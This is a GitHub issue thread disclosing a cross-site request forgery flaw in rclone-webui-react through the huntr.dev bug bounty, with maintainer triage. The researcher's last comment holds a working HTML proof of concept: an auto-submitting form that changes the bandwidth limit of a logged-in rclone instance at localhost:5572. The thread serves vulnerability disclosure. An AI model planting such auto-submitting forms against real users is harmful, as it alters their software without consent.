Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We鈥檒l occasionally send you account related emails.

Already on GitHub? Sign in to your account

馃毃 Potential Cross-Site Request Forgery (CSRF) #128

Open
huntr-helper opened this issue May 11, 2021 · 3 comments
Open

馃毃 Potential Cross-Site Request Forgery (CSRF) #128

huntr-helper opened this issue May 11, 2021 · 3 comments
Assignees
Labels

Comments

@huntr-helper
Copy link

馃憢 Hello, @negative0, @Greenkeeper[bot], @jackw - a potential high severity Cross-Site Request Forgery (CSRF) vulnerability in your repository has been disclosed to us.

Next Steps

1锔忊儯 Visit https://huntr.dev/bounties/1-other-rclone/rclone-webui-react for more advisory information.

2锔忊儯 Sign-up to validate or speak to the researcher for more assistance.

3锔忊儯 Propose a patch or outsource it to our community - whoever fixes it gets paid.


Confused or need more help?

  • Join us on our Discord and a member of our team will be happy to help! 馃

  • Speak to a member of our team: @JamieSlome


This issue was automatically generated by huntr.dev - a bug bounty board for securing open source code.

@negative0 negative0 self-assigned this May 11, 2021
@novik8989
Copy link

Hi @jackw, @negative0, can you please update the report status to valid at https://huntr.dev/bounties/1-other-rclone/rclone-webui-react/

@negative0
Copy link
Member

Hi,
Sorry for the late reply.

I am not able to validate using your HTML script, it keeps on asking for username and password, what options are you using while running rclone?

@novik8989
Copy link

novik8989 commented Jun 30, 2021

Hi @negative0,

I launched rclone using this command:
rclone rcd --rc-web-gui

Revisiting the issue, the problem seems to be the use of address http://127.0.0.1 instead of http://localhost in the POC. So please try the following POC to alter the bandwitch to 1M through CSRF. Also if the server needs credentials then this attack requires the user to be logged in. The logged in user is affected by CSRF just by visiting a malicious page hosted on attacker's website.

// changeBandwidth.html

<form method="POST" action="http://localhost:5572/core/bwlimit?rate=1M">
  <input type="submit" value="CSRF" />
  <script>
    document.forms[0].submit();
  </script>
</form>

Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Labels
Projects
None yet
Development

No branches or pull requests

3 participants